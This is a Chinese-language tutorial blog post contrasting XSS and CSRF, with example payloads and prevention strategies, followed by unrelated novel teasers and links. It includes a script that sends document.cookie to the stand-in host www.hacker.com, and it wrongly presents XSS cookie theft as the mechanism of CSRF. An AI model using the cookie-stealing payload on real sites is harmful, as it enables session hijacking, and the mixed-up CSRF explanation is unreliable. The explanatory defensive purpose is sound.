XSS-vs-CSRF

XSS:Cross Site Scripting,跨站脚本,其攻击的本质是让用户的浏览器运行一段刻意构造的脚本,其实用户的浏览器在加载页面时候会调用其中的脚本段,如果其中存在一段刻意构造的恶意脚本的话,就会被浏览器直接执行,造成攻击。
最常见的例子如下:
现在有一个网站有一个发帖子的功能,然后一个用户登录之后,在输入帖子的内容区输入了如下的内容:

<script type="text/javascript>
  alert("You were hacked!");
</script>

当用户点击发帖之后,如果服务器针对该内容没有进行转码或其他安全操作,则当其他用户刷新当前页面的时候,当该内容嵌入到页面的时候成为了页面的一部分元素,此时其他用户就会看到一个弹窗显示You were hacked!。这就是最常见的,最易理解的XSS攻击,就是通过在页面或者地址上构造恶意脚本实现不同的目的。
预防策略:
由于该攻击是由于输入的恶意脚本实现的,所以最直接的方式就是对该输入进行转义,转移之后再在页面显示则不会出现上述情况。
CSRF:Cross Site Request Forgery跨站请求伪造。从名字上就可以看出,该攻击是假冒用户进行恶意操作。
由于Http协议是无状态协议,即这一次请求和上一次请求没有关系,网站的用户认证一般都是采用的session的方式实现,之前的session直接存在客户端,可以直接获取,后来的操作都是在客户端的cookie中存储session_id。当用户登录之后,进行其他的操作的时候所有的Http请求的时候都会带上自身的cookies交给服务器进行验证,在前面的XSS攻击中,攻击者可以获取到用户的cookie,例如:

<script type="text/javascript>
  var sc = document.createElement("script");
  sc.src = "www.hacker.com?cook=" + document.cookie;
  sc.onload = function(){
    alert("Your cookie was stolen");
  }
</script>

通过上述操作之后,攻击者就可以获取到用户的通行证了,然后在进行其他操作的时候就可以用该cookie进行。
预防策略:
1:该攻击的原理是假冒用户,那么预防的就是加强用户认证,有一种方式是通过refer参数预防,即获取该请求来自的上一页的地址,通过该地址验证来请求来自哪里。但是refer在很多情况下获取不到,包括但不限于:
1.1:Location对象是一个用于页面导航的非常实用的对象。因为他允许你只变更Url的其中一部分。例如从cn域名切换到com域名,其他部分不变:window.location.hostname = "example.com";
但是,通过修改Location进行页面导航的方法,会导致在IE下丢失Referrer。
1.2:window.open方式打开新窗口之后在有些浏览器没有传递refer
1.3:鼠标拖拽打开新窗口,鼠标拖拽是现在非常流行的用户习惯,很多浏览器都内置或者可以通过插件的方式来支持鼠标拖拽式浏览。但是通过这种方式打开的页面,基本全都丢失referrer。并且,这种情况下,也无法使用window.opener的方式去获取丢失的referrer了。
2:通过在页面的输入表单中加入一个随机的字符串,然后将该字符串也嵌入到cookie中,当提交表单的时候服务器可以验证该字符串是否是预先嵌入的字符串进行验证。
3:通过POST的方式,对于提交表单等会发生资源修改的操作,POST操作是首选,由于Ajax在进行提交的时候不能跨域操作,所以可以避免一部分的攻击。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,884评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,347评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,435评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,509评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,611评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,837评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,987评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,730评论 0 267
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,194评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,525评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,664评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,334评论 4 330
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,944评论 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,764评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,997评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,389评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,554评论 2 349

推荐阅读更多精彩内容

  • http://www.91ri.org/tag/fuzz-bug 通常情况下,有三种方法被广泛用来防御CSRF攻击...
    jdyzm阅读 4,161评论 0 5
  • HTTP cookie(也称为web cookie,网络cookie,浏览器cookie或者简称cookie)是网...
    留七七阅读 17,876评论 2 71
  • 1. 网络基础TCP/IP HTTP基于TCP/IP协议族,HTTP属于它内部的一个子集。 把互联网相关联的协议集...
    yozosann阅读 3,440评论 0 20
  • <a name='html'>HTML</a> Doctype作用?标准模式与兼容模式各有什么区别? (1)、<...
    clark124阅读 3,462评论 1 19
  • 一:在制作一个Web应用或Web站点的过程中,你是如何考虑他的UI、安全性、高性能、SEO、可维护性以及技术因素的...
    Arno_z阅读 1,141评论 0 1